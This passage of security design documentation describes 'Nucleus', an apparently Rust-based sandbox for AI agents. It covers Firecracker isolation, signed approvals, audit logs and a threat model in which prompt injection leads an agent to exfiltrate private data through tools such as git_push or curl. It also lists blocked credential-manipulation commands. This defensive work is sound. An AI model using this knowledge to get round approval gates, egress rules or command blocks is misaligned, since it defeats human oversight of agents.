- Normalization (ν) enforces uninhabitable-state constraints.
Data Flows
Tool call
- Adapter signs request (if enabled).
- Signed proxy injects auth headers (if enabled).
- Proxy enforces policy and executes side effect.
- Audit log records action (and optional signature).
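The signing step in the tool-call flow can be sketched with standard HMAC-SHA256 over a canonical request; the exact wire format, header names, and request body shown here are assumptions, not Nucleus's real protocol.

```python
import hashlib
import hmac
import json

def sign_request(key: bytes, method: str, path: str, body: bytes) -> str:
    """HMAC over the canonical request; the proxy recomputes and compares."""
    msg = b"\n".join([method.encode(), path.encode(), body])
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

def verify(key: bytes, method: str, path: str, body: bytes, signature: str) -> bool:
    expected = sign_request(key, method, path, body)
    return hmac.compare_digest(expected, signature)  # constant-time compare

key = b"shared-secret"  # HMAC today; asymmetric keys are roadmap
body = json.dumps({"tool": "read_file", "path": "/workspace/main.rs"}).encode()
sig = sign_request(key, "POST", "/v1/tools", body)
assert verify(key, "POST", "/v1/tools", body, sig)
assert not verify(key, "POST", "/v1/tools", b"tampered", sig)
print("signature ok")
```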
Approval
- Agent requests approval.
- Proxy records approval count for the operation.
- Approval count is consumed for gated ops.
Non-goals (initial)
- Multi-tenant scheduling across hosts.
- Full UI control plane.
- Zero-knowledge attestation.
Progress Snapshot (Current)
Working today
- Enforced CLI path via `nucleus-node` (Firecracker) + MCP + `nucleus-tool-proxy` (read/write/run).
- Runtime gating for approvals, budgets, and time windows.
- Firecracker driver with default‑deny egress in a dedicated netns (Linux).
- Immutable network policy drift detection (fail‑closed on iptables changes).
- DNS allowlisting with pinned hostname resolution (dnsmasq in netns, Linux).
- Audit logs are hash-chained, signed, and verifiable (`nucleus-audit`).
Partial / in progress
- Web/search tools not yet wired in enforced mode.
- Approvals are runtime tokens with signed requests required; preflight approval bundles are planned.
- Kani proofs exist and run in a nightly job; merge gating and broader formal proofs are planned.
Not yet
- Remote append‑only audit storage / immutability proofs.
Invariants (current + intended)
- Side effects should only happen inside `nucleus-tool-proxy` (the host should not perform side effects).
- The Firecracker driver should only expose the signed proxy address to adapters.
- Guest rootfs is read-only; scratch is writable when configured in the image/spec.
- Network egress is denied by default for Firecracker pods when `--firecracker-netns=true`; if no `network` policy is provided, the guest has no NIC and iptables still default-denies.
- Monotone security posture: permissions and isolation guarantees should only tighten (or the pod is terminated), never silently relax after creation.
- Seccomp is fixed at Firecracker spawn.
- Network policy is applied once and verified for drift (fail‑closed monitor).
- Permission states are normalized via ν and only tightened after creation.
Security Architecture
Nucleus is built with security as a foundational principle, not an afterthought. This document describes the security guarantees, defense-in-depth layers, and compliance positioning.
Executive Summary
Nucleus provides:
- Memory-safe runtime (100% Rust) eliminating the ~70% of vulnerabilities attributable to memory-unsafety
- Cryptographic workload identity (SPIFFE/mTLS) instead of shared secrets
- Enforced permission boundaries (not advisory configuration)
- Defense-in-depth with multiple independent security layers
Regulatory alignment:
- CISA Secure by Design mandate (memory-safety roadmaps required by Jan 2026)
- NSA/CISA guidance on memory-safe programming languages
- White House directive on memory-safe code in critical infrastructure
Memory Safety: The Foundation
Why Rust Matters
According to Microsoft, Google, and NSA research, approximately 70% of security vulnerabilities are memory safety issues:
- Buffer overflows
- Use-after-free
- Null pointer dereferences
- Double frees
- Data races
Rust eliminates these vulnerability classes at compile time through its ownership system. Every line of Nucleus is written in Rust with no unsafe escape hatches in security-critical paths.
CISA Alignment
The Cybersecurity and Infrastructure Security Agency (CISA) now requires:
- Memory-safety roadmaps from critical infrastructure software providers (deadline: January 1, 2026)
- Adoption of memory-safe languages for new development
- Elimination of memory-unsafe code in security-critical components
Nucleus is memory-safe by default, requiring no roadmap transition.
Identity: SPIFFE/mTLS
No Shared Secrets
Traditional approaches use shared secrets (API keys, tokens) that can be:
- Leaked in logs
- Stolen from environment variables
- Intercepted in transit
- Replayed by attackers
Nucleus uses SPIFFE workload identity:
spiffe://trust-domain/ns/namespace/sa/service-account
Every workload receives a cryptographic identity (X.509 SVID) that:
- Cannot be forged without CA compromise
- Is bound to the workload, not a human-managed secret
- Enables mutual TLS (mTLS) for all service communication
- Supports automatic rotation without service disruption
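A SPIFFE ID is a URI, so authorization policy can match on its parts. An illustrative parse and prefix check (not SPIRE or Nucleus code; the trust domain and path values are hypothetical):

```python
from urllib.parse import urlparse

def parse_spiffe_id(spiffe_id: str) -> dict:
    """Split a spiffe:// URI into trust domain and workload path."""
    u = urlparse(spiffe_id)
    if u.scheme != "spiffe" or not u.netloc:
        raise ValueError(f"not a SPIFFE ID: {spiffe_id!r}")
    return {"trust_domain": u.netloc, "path": u.path}

wid = parse_spiffe_id("spiffe://example.org/ns/nucleus-system/sa/tool-proxy")
print(wid["trust_domain"], wid["path"])

# Authorization can then match on trust domain and path prefix:
assert wid["trust_domain"] == "example.org"
assert wid["path"].startswith("/ns/nucleus-system/")
```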
mTLS Everywhere
All communication between Nucleus components uses mutual TLS:
- Client authenticates to server
- Server authenticates to client
- Traffic is encrypted
- No party can impersonate another
┌─────────────────┐ mTLS ┌─────────────────┐
│ Orchestrator │──────────────>│ Tool Proxy │
│ │<──────────────│ │
│ Client SVID │ │ Server SVID │
└─────────────────┘ └─────────────────┘
│ │
└───── Same Trust Domain ─────────┘
(CA validates both)
Isolation: Defense in Depth
Nucleus implements multiple independent security layers:
Layer 1: Firecracker MicroVMs
Each agent task runs in a dedicated Firecracker microVM:
- Separate kernel instance
- Isolated memory space
- No shared filesystem (except explicit mounts)
- Hardware-enforced separation
Layer 2: Network Namespace Isolation
Each pod gets its own network namespace:
- Default-deny egress
- Explicit DNS allowlisting
- iptables policy with drift detection (fail-closed)
- No access to host network
Layer 3: Capability-Based Filesystem
File access uses cap-std for capability-based security:
- No ambient authority
- Must explicitly open files through capability handles
- Path traversal attacks blocked at syscall level
Layer 4: Policy Enforcement (portcullis)
The permission lattice provides mathematical guarantees:
- Capabilities can only tighten through composition
- Dangerous combinations (uninhabitable state) trigger additional gates
- No silent policy relaxation
Layer 5: Environment Isolation
Spawned processes receive only explicitly allowed environment variables:
- Parent environment is cleared (`env_clear()`)
- Only allowlisted variables are passed
- Prevents secret leakage from orchestrator to sandbox
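The same pattern in Python, for illustration (Nucleus's guest runtime does this in Rust via `env_clear()`; the allowlist and variable names here are hypothetical):

```python
import subprocess

ALLOWED_ENV = {"PATH", "HOME", "LANG"}  # illustrative allowlist

def spawn_clean(cmd: list, parent_env: dict) -> subprocess.CompletedProcess:
    """Start from an empty environment and copy over only allowlisted
    variables, so orchestrator secrets never reach the child."""
    env = {k: v for k, v in parent_env.items() if k in ALLOWED_ENV}
    return subprocess.run(cmd, env=env, capture_output=True, text=True)

parent = {"PATH": "/usr/bin:/bin", "AWS_SECRET_ACCESS_KEY": "hunter2", "HOME": "/root"}
result = spawn_clean(["env"], parent)
assert "AWS_SECRET_ACCESS_KEY" not in result.stdout  # secret never reaches the child
print(result.stdout.strip())
```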
The Uninhabitable State
Nucleus specifically guards against the uninhabitable state:
Private Data + Untrusted Content + Exfiltration Vector
│ │ │
▼ ▼ ▼
read_files web_fetch git_push
glob_search web_search create_pr
grep_search run_bash (curl)
When all three are present at autonomous levels, Nucleus:
- Detects the dangerous combination
- Adds approval obligations to exfiltration operations
- Requires human-in-the-loop confirmation
This prevents prompt injection attacks from silently exfiltrating sensitive data.
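The detection logic amounts to a monotone join over three booleans: flags can only be set, never cleared, and the gate fires when all three co-occur. A hedged sketch (the type and function names are illustrative, not portcullis's real types):

```rust
/// Exposure flags tracked per trace step, mirroring the 3-bool semilattice
/// described above. Names are illustrative.
#[derive(Clone, Copy, Default)]
struct Exposure {
    private_data: bool,
    untrusted_content: bool,
    exfil_vector: bool,
}

impl Exposure {
    /// Monotone join: flags can only be set, never cleared.
    fn join(self, other: Exposure) -> Exposure {
        Exposure {
            private_data: self.private_data || other.private_data,
            untrusted_content: self.untrusted_content || other.untrusted_content,
            exfil_vector: self.exfil_vector || other.exfil_vector,
        }
    }

    /// The uninhabitable state: all three flags co-occur.
    fn uninhabitable(self) -> bool {
        self.private_data && self.untrusted_content && self.exfil_vector
    }
}

/// Exfiltration operations gain an approval obligation once the state is reached.
fn requires_approval(exposure: Exposure, is_exfil_op: bool) -> bool {
    exposure.uninhabitable() && is_exfil_op
}

fn main() {
    let mut e = Exposure::default();
    e = e.join(Exposure { private_data: true, ..Default::default() }); // read_files
    e = e.join(Exposure { untrusted_content: true, ..Default::default() }); // web_fetch
    assert!(!requires_approval(e, true)); // no exfil vector yet
    e = e.join(Exposure { exfil_vector: true, ..Default::default() }); // git_push
    assert!(requires_approval(e, true)); // all three present: approval gate fires
}
```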
Input Validation
All external inputs are validated at API boundaries:
Length Limits
| Input Type | Maximum Length | Rationale |
|---|---|---|
| Glob/Regex patterns | 1,024 bytes | Prevent ReDoS |
| Search queries | 512 bytes | Prevent resource exhaustion |
| File paths | 4,096 bytes | Match filesystem limits |
| Command arguments | 16,384 bytes total | Prevent shell injection |
| stdin content | 1 MB | Prevent memory exhaustion |
| URLs | 2,048 bytes | Match browser limits |
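Enforcing these limits is a single table lookup at the boundary. A sketch (only the byte limits come from the table above; the `check_len` dispatch shape and kind names are assumptions):

```rust
/// Reject inputs exceeding the per-kind byte limits from the table above.
/// (Dispatch shape and kind names are illustrative.)
fn check_len(kind: &str, input: &[u8]) -> Result<(), String> {
    let max: usize = match kind {
        "pattern" => 1_024,  // glob/regex: prevent ReDoS
        "query" => 512,      // search: prevent resource exhaustion
        "path" => 4_096,     // match filesystem limits
        "args" => 16_384,    // command arguments, total
        "url" => 2_048,      // match browser limits
        "stdin" => 1 << 20,  // 1 MB: prevent memory exhaustion
        other => return Err(format!("unknown input kind: {other}")),
    };
    if input.len() > max {
        Err(format!("{kind} exceeds {max} bytes ({} given)", input.len()))
    } else {
        Ok(())
    }
}

fn main() {
    assert!(check_len("query", b"rust lattice").is_ok());
    assert!(check_len("pattern", &vec![b'a'; 2_000]).is_err()); // > 1,024 bytes
}
```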
ReDoS Protection
Regular expression patterns are scanned for catastrophic backtracking:
- Nested quantifiers: `(a+)+`
- Overlapping alternation: `(a|a)+`
- Excessive repetition: `a{1000,}`
Dangerous patterns are rejected before execution.
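A pre-filter for these three shapes can be a cheap textual scan before the pattern ever reaches the regex engine. The heuristics below are an illustrative sketch, not nucleus's actual scanner (a production scanner would more plausibly walk a parsed pattern AST):

```rust
/// Heuristic pre-filter for catastrophic-backtracking shapes.
/// Illustrative sketch only; see the three pattern classes above.
fn is_dangerous(pattern: &str) -> bool {
    // 1. Nested quantifiers: a quantified group that is itself quantified, e.g. (a+)+
    for inner in ["+)", "*)"] {
        if let Some(i) = pattern.find(inner) {
            if matches!(pattern.as_bytes().get(i + 2).copied(), Some(b'+') | Some(b'*')) {
                return true;
            }
        }
    }
    // 2. Excessive repetition: {N,...} with N >= 1000
    let mut rest = pattern;
    while let Some(open) = rest.find('{') {
        let tail = &rest[open + 1..];
        let digits: String = tail.chars().take_while(|c| c.is_ascii_digit()).collect();
        if digits.parse::<u64>().map_or(false, |n| n >= 1000) {
            return true;
        }
        rest = tail;
    }
    // 3. Overlapping alternation inside one group, e.g. (a|a)
    if let (Some(open), Some(close)) = (pattern.find('('), pattern.find(')')) {
        if open < close {
            let alts: Vec<&str> = pattern[open + 1..close].split('|').collect();
            for (i, a) in alts.iter().enumerate() {
                if alts[i + 1..].contains(a) {
                    return true;
                }
            }
        }
    }
    false
}

fn main() {
    assert!(is_dangerous("(a+)+"));
    assert!(is_dangerous("(a|a)+"));
    assert!(is_dangerous("a{1000,}"));
    assert!(!is_dangerous("^[a-z]+\\.rs$"));
}
```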
Path Validation
All paths are:
- Canonicalized to resolve symlinks and `..`
- Checked against sandbox boundaries
- Validated against allowlist/blocklist patterns
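A lexical version of the boundary check can be sketched with std's `Path` components (illustrative only; the real enforcement goes through cap-std and syscall-level canonicalization, which also resolves symlinks):

```rust
use std::path::{Component, Path, PathBuf};

/// Lexically resolve a candidate path against a sandbox root and verify
/// it stays inside. Sketch only: does not resolve symlinks.
fn resolve_in_sandbox(root: &Path, candidate: &str) -> Option<PathBuf> {
    let mut resolved = root.to_path_buf();
    for comp in Path::new(candidate).components() {
        match comp {
            Component::Normal(c) => resolved.push(c),
            Component::ParentDir => {
                // `..` may not climb above the sandbox root.
                if !resolved.pop() || !resolved.starts_with(root) {
                    return None;
                }
            }
            Component::CurDir => {} // `.` is a no-op
            _ => return None,       // absolute paths and prefixes rejected
        }
    }
    if resolved.starts_with(root) { Some(resolved) } else { None }
}

fn main() {
    let root = Path::new("/sandbox");
    assert!(resolve_in_sandbox(root, "src/main.rs").is_some());
    assert!(resolve_in_sandbox(root, "a/../b").is_some()); // stays inside
    assert!(resolve_in_sandbox(root, "../etc/passwd").is_none()); // traversal blocked
    assert!(resolve_in_sandbox(root, "/etc/passwd").is_none()); // absolute blocked
}
```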
Audit Logging
Every operation is logged with:
- Timestamp (monotonic + wall clock)
- Request ID (correlation)
- Operation type and parameters
- Outcome (success, denied, error)
- Principal identity (SPIFFE ID)
- Audit context (additional metadata)
What Gets Logged
| Event Type | Details |
|---|---|
| Successful operations | Operation, subject, result |
| Policy denials | Reason, attempted operation |
| Validation failures | Field, error |
| Authentication failures | Reason, attempted identity |
| System errors | Error code, context |
Hash-Chained Integrity
Audit logs are hash-chained using SHA-256:
- Each entry includes hash of previous entry
- Tampering is detectable
- Gaps are detectable
- Verified with `nucleus-audit`
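The chain structure itself is simple to sketch: each entry carries the hash of its predecessor, so verification is a single forward pass. The example below substitutes std's non-cryptographic `DefaultHasher` for SHA-256 purely to stay dependency-free; all names are illustrative:

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

/// One audit entry: payload plus the hash of the previous entry.
/// Nucleus uses SHA-256; `DefaultHasher` here is NOT cryptographically
/// secure and only demonstrates the chain structure.
struct Entry {
    payload: String,
    prev_hash: u64,
}

fn hash_entry(e: &Entry) -> u64 {
    let mut h = DefaultHasher::new();
    e.payload.hash(&mut h);
    e.prev_hash.hash(&mut h); // chaining: entry hash covers its predecessor link
    h.finish()
}

fn append(log: &mut Vec<Entry>, payload: &str) {
    let prev_hash = log.last().map(hash_entry).unwrap_or(0);
    log.push(Entry { payload: payload.into(), prev_hash });
}

/// Recompute the chain; any tampering or gap breaks a link.
fn verify(log: &[Entry]) -> bool {
    let mut prev = 0;
    for e in log {
        if e.prev_hash != prev {
            return false;
        }
        prev = hash_entry(e);
    }
    true
}

fn main() {
    let mut log = Vec::new();
    append(&mut log, "read_file /workspace/a.txt: ok");
    append(&mut log, "git_push: denied");
    assert!(verify(&log));
    log[0].payload = "read_file /workspace/a.txt: denied".into(); // tamper
    assert!(!verify(&log)); // chain breaks at the next entry
}
```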
Error Handling
Error messages are sanitized before returning to clients:
| Internal | Sanitized |
|---|---|
| `/var/sandbox/abc123/secrets/token.txt` | `[sandbox]/secrets/token.txt` |
| `/home/user/.config/credentials` | `[home]/.config/credentials` |
| `/etc/passwd` | `[path]` |
This prevents information disclosure that could aid attackers in understanding internal structure.
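Sanitization of this kind is a prefix rewrite over outgoing paths; a sketch (the helper name and the fallback rule are illustrative, with the mappings taken from the table above):

```rust
/// Rewrite internal path prefixes before an error message reaches a client.
/// Illustrative sketch: known roots map to placeholders, anything else
/// absolute collapses to an opaque `[path]`.
fn sanitize_path(path: &str, sandbox_root: &str, home: &str) -> String {
    if let Some(rest) = path.strip_prefix(sandbox_root) {
        format!("[sandbox]{rest}")
    } else if let Some(rest) = path.strip_prefix(home) {
        format!("[home]{rest}")
    } else if path.starts_with('/') {
        "[path]".to_string() // unknown absolute paths reveal nothing
    } else {
        path.to_string()
    }
}

fn main() {
    let (root, home) = ("/var/sandbox/abc123", "/home/user");
    assert_eq!(
        sanitize_path("/var/sandbox/abc123/secrets/token.txt", root, home),
        "[sandbox]/secrets/token.txt"
    );
    assert_eq!(
        sanitize_path("/home/user/.config/credentials", root, home),
        "[home]/.config/credentials"
    );
    assert_eq!(sanitize_path("/etc/passwd", root, home), "[path]");
}
```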
Approval System
Security-sensitive operations require explicit approval:
Approval Flow
- Operation triggers approval requirement
- Approval request generated with nonce
- Human reviews and approves/denies
- Approval token issued (HMAC-signed)
- Token validated before operation proceeds
- Token is single-use (nonce replay protection)
Token Security
- HMAC-SHA256 signed
- Bound to specific operation
- Time-limited expiry
- Nonce prevents replay
- Cannot be forged without secret
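The validation step (token checked before the operation proceeds, nonce spent exactly once) can be sketched as follows. HMAC-SHA256 signature verification is deliberately elided to keep the example dependency-free, and all type and field names are assumptions:

```rust
use std::collections::HashSet;
use std::time::{Duration, Instant};

/// Approval token fields (sketch). In nucleus the token is HMAC-SHA256
/// signed; signature verification is elided here.
struct Token {
    operation: String,
    nonce: u64,
    expires_at: Instant,
}

/// Tracks spent nonces so each token is single-use.
struct ApprovalValidator {
    used_nonces: HashSet<u64>,
}

impl ApprovalValidator {
    fn validate(&mut self, token: &Token, operation: &str, now: Instant) -> Result<(), &'static str> {
        if token.operation != operation {
            return Err("token bound to a different operation"); // operation binding
        }
        if now > token.expires_at {
            return Err("token expired"); // time-limited expiry
        }
        if !self.used_nonces.insert(token.nonce) {
            return Err("nonce already used"); // replay protection
        }
        Ok(())
    }
}

fn main() {
    let now = Instant::now();
    let mut v = ApprovalValidator { used_nonces: HashSet::new() };
    let t = Token {
        operation: "git_push".into(),
        nonce: 42,
        expires_at: now + Duration::from_secs(60),
    };
    assert!(v.validate(&t, "git_push", now).is_ok());
    assert!(v.validate(&t, "git_push", now).is_err()); // single-use: replay denied
    assert!(v.validate(&t, "web_fetch", now).is_err()); // wrong operation denied
}
```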
Budget Enforcement
Resource usage is tracked and limited:
Cost Model
| Operation | Cost Basis |
|---|---|
| Command execution | Base + per-second |
| File I/O | Per KB read/written |
| Network requests | Per request |
| Search operations | Per result/match |
Enforcement
- Budget is checked before operation starts
- Reservation model prevents races
- Atomic tracking for concurrent access
- Operations fail cleanly when budget exhausted
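The reservation model can be sketched with a compare-and-swap loop, so two concurrent operations can never both reserve the last unit of budget (names illustrative):

```rust
use std::sync::atomic::{AtomicU64, Ordering};

/// Reservation-model budget: atomically reserve cost BEFORE the operation
/// starts, so concurrent operations cannot race past the limit. Sketch.
struct Budget {
    remaining: AtomicU64,
}

impl Budget {
    fn reserve(&self, cost: u64) -> bool {
        let mut cur = self.remaining.load(Ordering::Acquire);
        loop {
            if cur < cost {
                return false; // fail cleanly when budget is exhausted
            }
            match self.remaining.compare_exchange_weak(
                cur,
                cur - cost,
                Ordering::AcqRel,
                Ordering::Acquire,
            ) {
                Ok(_) => return true,
                Err(actual) => cur = actual, // another thread moved first; retry
            }
        }
    }
}

fn main() {
    let b = Budget { remaining: AtomicU64::new(100) };
    assert!(b.reserve(60));
    assert!(!b.reserve(60)); // only 40 left: reservation refused up front
    assert!(b.reserve(40));
    assert!(!b.reserve(1)); // exhausted
}
```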
Compliance Positioning
CISA Secure by Design
| Requirement | Nucleus Status |
|---|---|
| Memory-safe language | Rust (100%) |
| Memory-safety roadmap | Not needed (already compliant) |
| Input validation | Comprehensive |
| Secure defaults | Yes |
SOC 2 Alignment
| Control | Implementation |
|---|---|
| Access control | SPIFFE/mTLS, capability-based |
| Audit logging | Hash-chained, comprehensive |
| Change management | Policy as code |
| Incident response | Fail-closed, drift detection |
OWASP Top 10
| Vulnerability | Mitigation |
|---|---|
| Injection | Input validation, parameterized commands |
| Broken auth | mTLS, no shared secrets |
| Sensitive data exposure | Environment isolation, error sanitization |
| XXE | No XML parsing in critical paths |
| Broken access control | Capability-based, enforced policy |
| Security misconfiguration | Secure defaults, drift detection |
| XSS | Not applicable (no web UI) |
| Insecure deserialization | Serde with strict schemas |
| Using vulnerable components | cargo-deny, security audits |
| Insufficient logging | Comprehensive audit trail |
Security Testing
Automated
- cargo-deny: License and vulnerability scanning
- cargo-audit: CVE database checks
- Property tests: Lattice laws, ν properties
- Adversarial tests: Path traversal, command injection
- mTLS tests: Certificate validation, trust boundaries
Planned
- Fuzzing: Command parsing, path normalization, policy deserialization
- Formal verification: Core lattice properties (Kani proofs)
Non-Goals
Nucleus does not protect against:
| Threat | Reason |
|---|---|
| Host kernel compromise | Enforcement stack must be trusted |
| Side-channel attacks | Requires hardware mitigations |
| Malicious human approvals | Social engineering is out of scope |
| VM escape | Firecracker hardening is assumed |
References
- CISA Secure by Design
- NSA Guidance on Memory Safe Languages
- The Uninhabitable State - Simon Willison
- SPIFFE Specification
- OWASP Input Validation Cheat Sheet
- Firecracker Security
Isolation Levels and Security Model
This document describes nucleus’s isolation architecture, driver options, and security tradeoffs for different deployment scenarios.
Isolation Hierarchy
Nucleus supports multiple isolation levels depending on the deployment environment:
| Level | Driver | Isolation | Boot Time | Network Control | Use Case |
|---|---|---|---|---|---|
| 4 | firecracker | Hardware VM (KVM) | ~125ms | Per-pod iptables | Production, untrusted code |
| 3 | lima (planned) | Full VM (QEMU/vz) | ~2-20s | VM-level | Development, macOS |
| 2 | gvisor (planned) | Syscall filtering | ~ms | gVisor stack | Semi-trusted workloads |
| 1 | local | Process only | ~ms | None | Trusted code, testing |
Driver Security Properties
Firecracker Driver (Level 4) - Recommended for Production
Security boundaries:
- Separate Linux kernel per pod (hardware-enforced via KVM)
- Minimal attack surface (~5 virtio devices)
- Read-only rootfs with scratch-only writes
- Per-pod network namespace with iptables enforcement
- Seccomp filtering on VMM process
Network isolation:
- Default-deny egress (no NIC unless `spec.network` specified)
- DNS allowlisting with pinned resolution
- Iptables drift detection (fail-closed on policy changes)
- No shared host interfaces (per-pod tap device)
Requirements:
- Linux host with `/dev/kvm`
- Apple Silicon M3/M4 + macOS 15+ (via Lima nested virtualization)
- Not supported: Intel Macs, older Apple Silicon, cloud VMs without nested virt
Local Driver (Level 1) - Development Only
Security boundaries:
- Process-level isolation only
- Shared host kernel
- Full network access (no isolation)
- Uninhabitable state guard still enforces approval requirements
What’s enforced:
- Command lattice (blocked commands like `gh auth`)
- Approval obligations (uninhabitable state constraint)
- Budget limits
- Path restrictions (via cap-std)
What’s NOT enforced:
- Network egress (dns_allow ignored)
- VM-level isolation
- Kernel separation
Use cases:
- Local development and testing
- Trusted first-party code
- Validating policy logic without VM overhead
# Explicitly opt-in to local driver (unsafe for untrusted code)
nucleus-node --driver local --allow-local-driver
Lima VM as Development Environment
For macOS users without firecracker support (Intel Macs, M1/M2), Lima provides a development-grade sandbox:
Lima Security Properties
| Property | Lima VM | Firecracker |
|---|---|---|
| Kernel isolation | Yes (separate Linux) | Yes (per-pod) |
| Per-pod isolation | No (shared VM) | Yes |
| Network control | VM-level only | Per-pod iptables |
| Boot time | ~2-20s | ~125ms |
| Escape difficulty | VM escape (high) | VM escape (high) |
Lima Architecture
┌─────────────────────────────────────────────────────────────┐
│ macOS Host │
│ ┌────────────────────────────────────────────────────────┐ │
│ │ Lima VM (QEMU/vz) │ │
│ │ ┌──────────────────────────────────────────────────┐ │ │
│ │ │ nucleus-node (local driver) │ │ │
│ │ │ ↓ │ │ │
│ │ │ nucleus-tool-proxy (per-pod process) │ │ │
│ │ │ - Policy enforcement │ │ │
│ │ │ - Command lattice │ │ │
│ │ │ - Uninhabitable state guard │ │ │
│ │ └──────────────────────────────────────────────────┘ │ │
│ │ /workspace (mounted from host) │ │
│ └────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────┘
Lima Configuration
# ~/.lima/nucleus/lima.yaml
mounts:
- location: "/path/to/workspace"
mountPoint: "/workspace"
writable: true
provision:
- mode: system
script: |
# Install musl toolchain for static binaries
apt-get install -y musl-tools musl-dev
# ... (Rust setup)
Lima Limitations
- No per-pod network isolation: All pods share VM’s network
- No dns_allow enforcement: Network policy requires firecracker
- Shared kernel attack surface: All pods share Lima’s kernel
- Not suitable for untrusted code in production
NVIDIA’s Mandatory Security Controls
Based on NVIDIA’s guidance for agentic sandboxing:
1. Network Egress Controls (Firecracker only)
spec:
network:
dns_allow:
- "api.github.com"
- "github.com"
# All other egress blocked by default
2. Workspace Write Restrictions
Nucleus enforces via:
- Read-only rootfs
- Scratch-only write paths
- cap-std path sandboxing
3. Configuration File Protection
Command lattice blocks:
- `gh auth *`, `gh config *` (credential manipulation)
- Writes to `.git/hooks`, `.claude/`, etc.
Uninhabitable State Guard
Regardless of driver, nucleus enforces the uninhabitable state constraint:
When all three capabilities are present at autonomous levels:
- Private data access (read_files)
- Untrusted content exposure (web_fetch)
- External communication (git_push, api_call)
Exfiltration operations gain approval obligations - requiring human confirmation before execution.
# Even with "permissive" profile:
$ gh pr create
{"error": "approval required", "operation": "gh pr create"}
This is defense-in-depth: even if network/VM isolation fails, the agent cannot autonomously exfiltrate data.
Platform Recommendations
| Platform | Recommended Driver | Notes |
|---|---|---|
| Linux + KVM | firecracker | Full production support |
| M3/M4 Mac + macOS 15+ | firecracker (via Lima) | Native KVM in nested VM |
| M1/M2 Mac | local (in Lima) | No KVM, use Lima for kernel isolation |
| Intel Mac | local (in Lima) | No KVM, Lima provides VM boundary |
| Cloud VM (no nested virt) | local or gvisor (planned) | Consider PVM if available |
Defense-in-Depth Layers
Layer 5: Approval obligations (uninhabitable state guard)
Layer 4: Command lattice (blocked commands)
Layer 3: Path sandboxing (cap-std)
Layer 2: Network isolation (iptables/dns_allow) [firecracker only]
Layer 1: VM isolation (KVM/QEMU)
Layer 0: Host kernel
Even when lower layers are unavailable (e.g., local driver), higher layers still provide meaningful security:
- Command blocking prevents
gh auth login - Path sandboxing prevents writes outside workspace
- Uninhabitable state guard requires approval for exfiltration
References
- How to Sandbox AI Agents in 2026 - Isolation technology comparison
- NVIDIA Sandboxing Guidance - Mandatory controls
- Lima v2.0 for AI Workflows - Lima security features
- The Uninhabitable State - Original threat model
Threat Model (25k plan)
Assets
- Host filesystem and secrets.
- Pod data (inputs, outputs, logs).
- Approval decisions and audit trail.
- Policy grants and enforcement state.
Trust Assumptions
- Firecracker provides VM isolation from the host kernel.
- Host kernel is not compromised.
- Cryptographic primitives are implemented correctly.
- Local driver is for trusted workloads only.
Adversaries
- Malicious prompt injection within agent inputs.
- Untrusted tool output or external content.
- Compromised adapter or malformed requests.
- Accidental operator misconfiguration.
Threats by Boundary
Agent -> Control Plane
- Replay of tool requests.
- Forged approvals.
- Tool call parameter tampering.
Mitigations
- Signed requests required, nonce/timestamp with max skew.
- Signed approval requests require nonce + expiry; preflight bundles are roadmap.
Control Plane -> VM
- VM proxy spoofing.
- Traffic interception.
Mitigations
- Vsock-only transport.
- VM-unique secret provisioned at boot (auth secret baked into rootfs).
VM -> Host
- Escapes via shared filesystem.
- Excessive resource usage.
Mitigations
- Read-only rootfs, scratch-only write.
- Cgroup CPU/memory limits.
- Seccomp on VMM.
- Host netns iptables enforce default deny when `--firecracker-netns=true` (even without `spec.network`).
- Netns iptables are snapshotted and monitored; drift fails closed by terminating the pod.
- Node provisions per-pod netns + tap to avoid shared host interfaces.
- Requires `br_netfilter` so bridge traffic hits iptables.
Host Signed Proxy
- Threat: host-local callers bypass auth by calling the vsock bridge directly.
- Mitigation: only expose the signed proxy address to adapters.
Non-goals
- Side-channel resistance.
- Host kernel compromise.
- Zero-knowledge verification.
Acceptance Tests (25k plan)
Enforcement (current)
- Any filesystem access outside sandbox root is denied (cap-std sandbox).
- Any command not in allowlist (or structured rules) is denied.
- Approval-gated operation fails without a recorded approval.
- Approval grants expire (default TTL, enforced when auth is enabled).
- Approval requests are gated by a separate approval secret and nonce.
- Budget exhaustion blocks further side effects.
- Time window expiry blocks execution.
Uninhabitable State (current)
- When private data + untrusted content + exfil path are all enabled, approvals are required for exfil operations.
Network (current)
- Host netns iptables enforces default-deny egress for Firecracker pods when `--firecracker-netns=true` (even without `spec.network`).
- Host monitors iptables drift and fails closed by terminating pods on deviation.
- Allowlisted egress only for IP/CIDR with optional port (no hostnames).
- Guest init configures eth0 from kernel args (`nucleus.net=...`) when a network policy is present.
- Node provisions tap + bridge inside the pod netns only when `spec.network` is set (guest NIC is otherwise absent).
- Integration: `scripts/firecracker/test-network.sh` boots a VM and verifies cmdline + iptables rules.
- Optional connectivity test uses `nucleus-net-probe` via the tool proxy (CHECK_CONNECTIVITY=1).
Audit (current)
- Every tool call produces a signed audit log record (verifiable).
- Audit entries are hash-chained; tampering breaks the chain.
- Approval events are logged with operation name and count.
- Guest init emits a boot report entry on startup.
VM Isolation (current)
- Rootfs is read-only when configured in the image/spec.
- Scratch is mounted when configured.
- Proxy starts via init with no extra services.
Roadmap Tests
- Approval tokens must be signed, bounded to op + expiry + nonce.
- Audits must include cryptographic signatures and issuer identity.
- Network egress should be enforced via cgroup/eBPF filters (beyond iptables).
Formal Methods Plan
Goal: move from model checking to machine-checked proofs for the core lattice
and nucleus (ν) properties, while keeping the spec small and auditable.
Scope (initial)
- Permission lattice order and join/meet.
- Nucleus `ν` (normalization) laws:
  - Idempotent: ν(ν(x)) = ν(x)
  - Monotone: x ≤ y ⇒ ν(x) ≤ ν(y)
  - Deflationary: ν(x) ≤ x
- Uninhabitable state obligations as a derived constraint.
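On a small finite model, the three ν laws can be checked exhaustively. The sketch below models ν as a meet with a policy ceiling — one simple operator that satisfies all three laws — and is illustrative only; the real ν is richer and is what the Lean/Kani work targets:

```rust
/// Tiny 3-level model of the permission order. Illustrative only.
#[derive(Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Debug)]
enum Level {
    Never,
    LowRisk,
    Always,
}

/// Model ν as "clamp to a policy ceiling": ν(x) = x ⊓ c.
/// This operator satisfies idempotence, monotonicity, and deflation.
fn nu(x: Level, ceiling: Level) -> Level {
    std::cmp::min(x, ceiling)
}

fn main() {
    use Level::*;
    let all = [Never, LowRisk, Always];
    for &c in &all {
        for &x in &all {
            assert!(nu(x, c) <= x); // Deflationary: ν(x) ≤ x
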